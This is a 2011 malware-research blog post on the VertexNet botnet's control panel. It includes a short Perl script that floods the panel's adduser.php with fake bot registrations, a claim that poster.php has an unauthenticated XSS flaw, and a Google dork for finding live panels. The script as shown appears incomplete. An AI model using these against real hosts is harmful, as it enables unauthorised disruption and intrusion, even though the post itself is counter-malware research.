Tuesday 17 May 2011

VertexNet v1.1.1 Loader Vulnerabilities

The 15th i've see this sample: http://vxvault.siri-urz.net/ViriFiche.php?ID=9330

Appear to be a VertexNet bot after a short analysis.

VertexNet v1.1.1 Builder:

Malware call home with 'V32' as user-agent:

Task check

I will not do a full analysis, but it's relatively simple to understand how it's work.
If you want start into malware reversing, i think VertnetNet 1.1.1 is a good exercise.

Well, to return on the original subject the adduser.php is not protected against flood attack.
So here is a short perl script for exploit that:

# VertexNet v1.1.1 Flood Bots
# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
# Xyl2k! :þ

use HTTP::Request;
use LWP::UserAgent;

$URL = "http://localhost/Panel/adduser.php";

$useragent = LWP::UserAgent -> new();
$useragent -> agent('V32');

$try = 0;

        $rnd = rand();

        $request = HTTP::Request -> new(GET => $URL . '?uid={' . $rnd . '}&lan=!&country=Fran.ais%20(France)%20+33&cc=FR&idle=0&ver=v1337');
        $response = $useragent -> request($request);

        if ($response -> is_success)
                print("[~] The fire day " . $try . "\n");

And poster.php appear also vulnerable to xss (without being logged into the C&C)

VertexNet Panel can easily be dorked in google, somthing like intitle:"VertexNet v1.1"+intext:"Username :"
 who want send abuse ? :)

For terminate, here is the music of the builder :þ

1 comment: